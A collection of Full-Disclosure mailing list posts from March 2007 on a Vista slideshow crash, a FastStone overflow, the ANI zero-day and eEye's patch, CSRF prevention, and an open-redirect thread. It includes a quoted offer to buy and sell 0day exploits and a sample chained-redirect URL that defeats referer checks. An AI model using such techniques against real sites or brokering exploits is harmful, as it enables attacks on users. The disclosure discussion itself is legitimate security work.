Re: [Full-disclosure] [VulnWatch] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
Dear Micha³ Majchrowicz, This image also effectively exploits stack overflow (?) in FastStone Image Viewer 2.8, EIP/EBP is 0x41414141. --Monday, March 26, 2007, 12:20:07 AM, you wrote to [EMAIL PROTECTED]: MM> Everytime you try to turn on the slideshow with a JPG file in the MM> folder you get BSoD MM> (http://sectroyer.110mb.com/vuln/vista_bsod.jpg). You can test it by MM> turningonthe slideshow in the following directory: MM> c:Windows\Web\Wallpaper\ Since this case cannot be connect with -- ~/ZARAZA http://securityvulns.com/ Ïàòðèîòèçì - ýòî òà æå ðåëèãèÿ. (Òâåí) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] MADYNES voip fuzzer
Shawn, this fuzzer seems to be based on their KIPH framework. The KIPH software is not freely available. I wonder if they would release to researchers.. Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Microsoft Windows Vista Slideshow Unspecified Blue Screen Of Death Vulnerability
It seems that Vista has some problems with ATI drivers. It was already reported that file atikmdag.sys can cause BSoD after leaving the game (http://leovilletownsquare.com/fusionbb/showtopic.php?tid/17600/ ). Today user with nickname Olo contacted my and by making some tests we where able to determine that there are more problems with this driver and Vista. We where using this configuration: http://sectroyer.110mb.com/vuln/hardware.jpg Everytime you try to turn on the slideshow with a JPG file in the folder you get BSoD (http://sectroyer.110mb.com/vuln/vista_bsod.jpg ). You can test it by turning on the slideshow in the following directory: c:Windows\Web\Wallpaper\ Since this case cannot be connect with 2d-3d mode changes it seems that there is some vulnerability directly in Windows Vista which cause this BSoD in atikmdag.sys (ATI Kernel Driver). This vulnerability can be used as a DoS but Code Execution haven't been confirmed or denied. Regards Michael Majchrowicz. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buy 0day vulnerability
On 3/30/07, Peter Dawson <[EMAIL PROTECTED]> wrote: > On 3/30/07, Guasconi Vincent <[EMAIL PROTECTED]> wrote: > > > > > > Correct me if I'm wrong, but wouldn't that defeat the point of Full > > > Disclosure? > > > > Correct him if I'm right, but wouldn't that defeat the point of Full > > Disclosure? > > maybe it just an invite to the dark side of the force "I will be a good Jedi, like my father" -- Guasconi Vincent Etudiant. http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buy 0day vulnerability
maybe it just an invite to the dark side of the force On 3/30/07, Guasconi Vincent <[EMAIL PROTECTED]> wrote: > > Correct me if I'm wrong, but wouldn't that defeat the point of Full > Disclosure? Correct him if I'm right, but wouldn't that defeat the point of Full Disclosure? -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buy 0day vulnerability
On 3/29/07, Michael Bann <[EMAIL PROTECTED]> wrote: > [EMAIL PROTECTED] wrote: > > We buy and sell 0day vulnerability along with working demostrative exploit. > > > > We are interested only in client side exploits. > > > > We are interested in Internet Explorer and Microsoft Office. > > > > If you have good vulnerability we can pay cash, western union or wire > > transfer in advance. > > > > If you are a motivated researcher and are interested in a full time > > consultancy let us to know. > > > > Please contact to this email address. > > > > We own and sell several Microsoft 0day (the one used by a couple of asiatic > > intelligence agencies) and we buy them from skilled hackers. > > Correct me if I'm wrong, but wouldn't that defeat the point of Full > Disclosure? Correct him if I'm right, but wouldn't that defeat the point of Full Disclosure? -- Guasconi Vincent Etudiant. http://altmylife.blogspot.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Preventing Cross-site Request Forgeries
http://www.gnucitizen.org/blog/preventing-csrf I briefly covered how simple it is to prevent CSRF attacks. Hope that you find it useful. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] secure listserv config
What? A security company sets up a mailing list, but allows any tom, dick or J.Random Hacker Jr. III to post to it? Then fails to notice the storm of people saying "unsubscribe!", "me, too!", "shut up!", "stop sending me all this crap!" and "No, you stop!"?? Inconceivable! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0-day ANI vulnerability in Microsoft Windows (CVE-2007-0038)
hackers blitz into Tk-Maxx - unfortunate... http://news.bbc.co.uk/1/hi/business/6508983.stm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ANI Zeroday, Third Party Patch
A new vulnerability was recently discovered, in the wild, that affects the .ANI file format. This flaw affects all versions of Microsoft Windows and can be delivered through multiple attack vectors, specifically any user who visits a malicious website. This flaw remains as of yet unpatched by Microsoft. Interesting to point out is the similarity between this new zeroday and a .ANI file vulnerability that eEye discovered as far back as 2005. It seems even though Microsoft takes on average over 6 months to produce patches they still are failing in being able to perform a proper code audit to find similar and related vulnerabilities. This is made more apparent by the fact that this vulnerable code also ships with Windows Vista. We have provided a brief analysis, free third party patch (with source code), which is all available here: http://research.eeye.com/html/alerts/zeroday/20070328.html This patch like ones we have done previously has full command line options, for scripting and related, and also source code is included for your learning/verification etc... As always patches like this are experimental, i.e. we are not Microsoft, however we have taken as many precautions as we can to make the patch as stable as possible. Alternatively we also provide a complete, free host based security solution which will protect from this attack and many others, which you can download here: http://www.eeye.com/blinkfree Any questions, comments, improvements, please direct them to [EMAIL PROTECTED] Signed, Marc Maiffret Co-Founder/CTO Chief Hacking Officer eEye Digital Security T.949.349.9062 F.949.349.9329 http://eEye.com/Blink - End-Point Vulnerability Prevention http://eEye.com/Retina - Network Security Scanner http://eEye.com/Iris - Network Traffic Analyzer http://eEye.com/SecureIIS - Stop known and unknown IIS vulnerabilities ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] NewOrder.box.sk Inherits Severe
Referer checking will not stop open redirects you must create a whitelist. Consider the following http://site/script?u=http://site/script?u=http://cnn.com It will hit the script, redirect back to itself set the referer header then continue. - Robert http://www.cgisecurity.com/ Application security news and more. http://www.cgisecurity.com/index.rss [RSS Feed] > > Hello Aditya, > I see your point there. Hope they get it fixed. Should the patch involve > some referrer checking? > > Regards, > -Nikolay Kichukov > > - Original Message - > From: "Aditya K Sood" <[EMAIL PROTECTED]> > To: "Nikolay Kichukov" <[EMAIL PROTECTED]>; > > Sent: Thursday, March 29, 2007 7:40 PM > Subject: Re: [Full-disclosure] NewOrder.box.sk Inherits Severe > RedirectionVulnerability > > > > Nikolay Kichukov wrote: > > > Hello there, > > > I've read the article, but I still do not see where the severe > redirection > > > vulnerability is. Is this not a feature of the neworder.box.sk web site > to > > > allow anyone to be redirected to anypage they submit to redirect.php? > > > > > > Thanks, > > > -Nikolay Kichukov > > > > > > > > > - Original Message - > > > From: "Aditya K Sood" <[EMAIL PROTECTED]> > > > To: > > > Sent: Wednesday, March 28, 2007 8:49 PM > > > Subject: [Full-disclosure] NewOrder.box.sk Inherits Severe > > > RedirectionVulnerability > > > > > > > > > > > >> Hi > > >> > > >> Previous Rootkit.com Vulnerability have been patched. > > >> The neworder.box.sk is famous security website.It inherits very > specific > > >> redirection attacks. The domain forwarding or URL forwarding not only > > >> directly possible through the website but can be called from third > party > > >> directly. > > >> > > >> A very generic analysis have been undertaken based on search engine > > >> specification.Look into the issues at: > > >> > > >> > http://zeroknock.blogspot.com/2007/03/neworderboxsk-inherits-severe.html > > >> http://zeroknock.metaeye.org/analysis/neworder_red.xhtml > > >> > > >> Regards > > >> Zeroknock > > >> http://zeroknock.metaeye.org/mlabs > > >> > > >> ___ > > >> Full-Disclosure - We believe in it. > > >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > >> Hosted and sponsored by Secunia - http://secunia.com/ > > >> > > >> > > > > > > > > > > > Hi nikolay > > > >Thats where the thinking is bit off side. > > Remember there > > is lot of difference between redirection occurs from the main website > > through generating event and the redirection that occurs from the third > > party.It will be okay to the feature context if the redirection supports > > only from the website. > > > > More precisely a search engine check is performed at the top to show > > that the page is not subjected as standard page for redirection. If its > > a feature than it must not be redirected from the third party. > > > > Thats All. > > > > Regards > > Adi > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
